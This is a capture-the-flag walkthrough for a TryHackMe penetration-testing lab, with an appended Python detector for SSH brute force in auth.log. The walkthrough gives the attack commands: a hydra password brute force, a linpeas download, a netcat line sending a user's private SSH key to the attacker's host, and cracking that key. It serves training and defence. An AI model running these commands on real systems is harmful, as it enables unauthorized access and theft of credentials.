TryHackMe | Basic Pentesting WriteUp / Walkthrough (English)
Basic Pentesting
=====================================================================
- sudo nmap IP -vv -sV. You have 6 ports open, including 2 web servers, one running on port 80 and the other on port 8080. Port 80 shows the message “Undergoing Maintenance”. To find the hidden directory run gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://IP/ -r, which reveals /development.
- In /development you have messages that don’t do much, so move on.
- To make the brute forcing easier we can use SMB to look for usernames on the server. We will let enum4linux do all the enumeration with -a: enum4linux -a IP. From the results you get two usernames, jan and kay.
- Starting with jan, hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://IP gives you the password *******.
- Now use SSH to log in to the system as user jan. Start an HTTP server on your machine to transfer linpeas.sh to the victim. Download the script into the victim’s /tmp directory using wget, chmod +x linpeas.sh, then ./linpeas.sh. In the output of linpeas.sh you will find something interesting:
You have actually been given the private key of user kay, but it is encrypted. Transfer this file to your machine using netcat: cd /home/kay/.ssh then nc -nv 10.18.96.207 1234 < id_rsa. On your machine set up a netcat listener that will receive the file: nc -nlvp 1234 > id_rsa.
- Now you need to crack it to get the passphrase: ssh2john id_rsa > ssh.hash, then john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt. The password is *********. Then chmod 400 id_rsa. Now you can use this file to connect to the target machine as kay.
- ssh kay@IP -i id_rsa. Once you are in, list the contents and retrieve the flag ✨.
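The hydra step above guesses jan’s SSH password by trying rockyou.txt entries one after another, which leaves a burst of sshd failures followed by a single success in the target’s auth log. As an added example (not part of the original writeup), the following Python parses constructed auth.log lines and flags exactly that pattern; the host name basic2, the timestamps and the 192.168.1.20 address are made up, and the log year is assumed since syslog timestamps carry none.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log lines (not captured from the room).
SAMPLE_LOG = """\
Mar  3 10:00:01 basic2 sshd[1201]: Failed password for jan from 10.18.96.207 port 40001 ssh2
Mar  3 10:00:01 basic2 sshd[1203]: Failed password for jan from 10.18.96.207 port 40002 ssh2
Mar  3 10:00:02 basic2 sshd[1205]: Failed password for jan from 10.18.96.207 port 40003 ssh2
Mar  3 10:00:02 basic2 sshd[1207]: Failed password for jan from 10.18.96.207 port 40004 ssh2
Mar  3 10:00:03 basic2 sshd[1209]: Failed password for jan from 10.18.96.207 port 40005 ssh2
Mar  3 10:00:03 basic2 sshd[1211]: Accepted password for jan from 10.18.96.207 port 40006 ssh2
Mar  3 10:05:00 basic2 sshd[1300]: Failed password for kay from 192.168.1.20 port 50001 ssh2
Mar  3 10:09:00 basic2 sshd[1302]: Accepted publickey for kay from 192.168.1.20 port 50002 ssh2
"""

# Matches both "Failed password for ..." and "Accepted publickey for ..." sshd lines,
# including the "invalid user" variant written for unknown account names.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse_ts(ts, year=2024):
    # syslog timestamps have no year; an assumed one lets us compute deltas
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return alerts for any source IP with >= threshold failures inside
    window_seconds, plus a second alert if that IP then logs in successfully."""
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    flagged = set()                # ips already reported as brute forcing
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip, user = parse_ts(m["ts"]), m["ip"], m["user"]
        if m["result"] == "Failed":
            # keep only failures still inside the sliding window, then add this one
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"ip": ip, "type": "bruteforce", "failures": len(recent)})
        elif ip in flagged:
            # a success right after a failure burst means a password was guessed
            alerts.append({"ip": ip, "type": "success_after_bruteforce", "user": user})
    return alerts
```

The single failure from 192.168.1.20 followed by a key-based login stays below the threshold and is not reported, so the output is only the two alerts for the hydra-style burst.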

